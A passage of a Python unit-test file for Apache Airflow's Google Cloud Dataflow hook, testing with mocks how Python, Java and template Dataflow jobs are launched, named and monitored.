'projects/TEST_PROJECT_ID/locations/TEST_LOCATIONS/keyRings/TEST_KEYRING/cryptoKeys/TEST_CRYPTOKEYS'
),
'maxWorkers': 10,
'network': 'default',
'numWorkers': 2,
'serviceAccountEmail': 'test@apache.airflow',
'subnetwork': 'regions/REGION/subnetworks/SUBNETWORK',
'tempLocation': 'gs://test/temp',
'workerRegion': "test-region",
'workerZone': 'test-zone',
'zone': 'us-central1-f',
'machineType': 'n1-standard-1',
}
BASE_STRING = 'airflow.providers.google.common.hooks.base_google.{}'
DATAFLOW_STRING = 'airflow.providers.google.cloud.hooks.dataflow.{}'
TEST_PROJECT = 'test-project'
TEST_JOB_ID = 'test-job-id'
TEST_LOCATION = 'custom-location'
DEFAULT_PY_INTERPRETER = 'python3'
TEST_FLEX_PARAMETERS = {
"containerSpecGcsPath": "gs://test-bucket/test-file",
"jobName": 'test-job-name',
"parameters": {
"inputSubscription": 'test-subscription',
"outputTable": "test-project:test-dataset.streaming_beam_sql",
},
}
TEST_PROJECT_ID = 'test-project-id'
TEST_SQL_JOB_NAME = 'test-sql-job-name'
TEST_DATASET = 'test-dataset'
TEST_SQL_OPTIONS = {
"bigquery-project": TEST_PROJECT,
"bigquery-dataset": TEST_DATASET,
"bigquery-table": "beam_output",
'bigquery-write-disposition': "write-truncate",
}
TEST_SQL_QUERY = """
SELECT
sales_region as sales_region,
count(state_id) as count_state
FROM
bigquery.table.test-project.beam_samples.beam_table
GROUP BY sales_region;
"""
TEST_SQL_JOB_ID = 'test-job-id'
DEFAULT_CANCEL_TIMEOUT = 5 * 60
class TestFallbackToVariables(unittest.TestCase):
def test_support_project_id_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(project_id="TEST")
mock_instance.assert_called_once_with(project_id="TEST")
def test_support_project_id_from_variable_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(variables={'project': "TEST"})
mock_instance.assert_called_once_with(project_id='TEST', variables={})
def test_raise_exception_on_conflict(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException,
match="The mutually exclusive parameter `project_id` and `project` key in `variables` parameter "
"are both present\\. Please remove one\\.",
):
FixtureFallback().test_fn(variables={'project': "TEST"}, project_id="TEST2")
def test_raise_exception_on_positional_argument(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException, match="You must use keyword arguments in this methods rather than positional"
):
FixtureFallback().test_fn({'project': "TEST"}, "TEST2")
def mock_init(
self,
gcp_conn_id,
delegate_to=None,
impersonation_chain=None,
): # pylint: disable=unused-argument
pass
class TestDataflowHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
self.dataflow_hook.beam_hook = MagicMock()
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.DataflowHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.build")
def test_dataflow_client_creation(self, mock_build, mock_authorize):
result = self.dataflow_hook.get_conn()
mock_build.assert_called_once_with(
'dataflow', 'v1b3', http=mock_authorize.return_value, cache_discovery=False
)
assert mock_build.return_value == result
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables["region"] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_multiple_extra_packages(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables['extra-package'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables['extra-package'] = ['a.whl', 'b.whl']
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
('python3',),
('python2',),
('python3',),
('python3.6',),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_interpreter(
self, py_interpreter, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=py_interpreter,
py_requirements=None,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=py_interpreter,
py_options=PY_OPTIONS,
py_requirements=None,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
(['foo-bar'], False),
(['foo-bar'], True),
([], True),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_non_empty_py_requirements_and_without_system_packages(
self,
current_py_requirements,
current_py_system_site_packages,
mock_callback_on_job_id,
mock_dataflow_wait_for_done,
mock_uuid,
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
def test_start_python_dataflow_with_empty_py_requirements_and_without_system_packages(
self, mock_dataflow_wait_for_done, mock_uuid
):
self.dataflow_hook.beam_hook = BeamHook(runner="DataflowRunner")
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"), self.assertRaisesRegex(
AirflowException, "Invalid method invocation."
):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=[],
on_new_job_id_callback=on_new_job_id_callback,
)
mock_dataflow_wait_for_done.assert_not_called()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_multiple_values_in_variables(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['mock-option'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(passed_variables)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['region'] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@parameterized.expand(
[
(JOB_NAME, JOB_NAME, False),
('test-example', 'test_example', False),
(f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}', JOB_NAME, True),
(f'test-example-{MOCK_UUID_PREFIX}', 'test_example', True),
('df-job-1', 'df-job-1', False),
('df-job', 'df-job', False),
('dfjob', 'dfjob', False),
('dfjob1', 'dfjob1', False),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
def test_valid_dataflow_job_name(self, expected_result, job_name, append_job_name, mock_uuid4):
job_name = self.dataflow_hook.build_dataflow_job_name(
job_name=job_name, append_job_name=append_job_name
)
self.assertEqual(expected_result, job_name)
#
@parameterized.expand([("1dfjob@",), ("dfjob@",), ("df^jo",)])
def test_build_dataflow_job_name_with_invalid_value(self, job_name):
self.assertRaises(
ValueError, self.dataflow_hook.build_dataflow_job_name, job_name=job_name, append_job_name=False
)
#
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_get_job(self, mock_conn, mock_dataflowjob):
method_fetch_job_by_id = mock_dataflowjob.return_value.fetch_job_by_id
self.dataflow_hook.get_job(job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_by_id.assert_called_once_with(TEST_JOB_ID)
#
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_metrics_by_id = mock_dataflowjob.return_value.fetch_job_metrics_by_id
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_metrics_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id_controller(self, mock_conn):
method_get_metrics = (
mock_conn.return_value.projects.return_value.locations.return_value.jobs.return_value.getMetrics
)
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
method_get_metrics.return_value.execute.assert_called_once_with(num_retries=0)
method_get_metrics.assert_called_once_with(
jobId=TEST_JOB_ID, projectId=TEST_PROJECT_ID, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_messages_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_messages_by_id = mock_dataflowjob.return_value.fetch_job_messages_by_id
self.dataflow_hook.fetch_job_messages_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_messages_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_autoscaling_events_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_autoscaling_events_by_id = (
mock_dataflowjob.return_value.fetch_job_autoscaling_events_by_id
)
self.dataflow_hook.fetch_job_autoscaling_events_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_autoscaling_events_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_wait_for_done(self, mock_conn, mock_dataflowjob):
method_wait_for_done = mock_dataflowjob.return_value.wait_for_done
self.dataflow_hook.wait_for_done(
job_name="JOB_NAME",
project_id=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
multiple_jobs=False,
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
name="JOB_NAME",
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
job_id=TEST_JOB_ID,
num_retries=self.dataflow_hook.num_retries,
multiple_jobs=False,
drain_pipeline=self.dataflow_hook.drain_pipeline,
cancel_timeout=self.dataflow_hook.cancel_timeout,
wait_until_finished=self.dataflow_hook.wait_until_finished,
)
method_wait_for_done.assert_called_once_with()
class TestDataflowTemplateHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow(self, mock_conn, mock_controller, mock_uuid):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
variables = {'zone': 'us-central1-f', 'tempLocation': 'gs://test/temp'}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=copy.deepcopy(variables),
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={
'jobName': f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
'parameters': PARAMETERS,
'environment': variables,
},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id='test-job-id',
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_variable(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables={'region': TEST_LOCATION},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
projectId=TEST_PROJECT,
location=TEST_LOCATION,
gcsPath=TEST_TEMPLATE,
body=mock.ANY,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_parameter(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables={},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={'jobName': UNIQUE_JOB_NAME, 'parameters': PARAMETERS, 'environment': {}},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
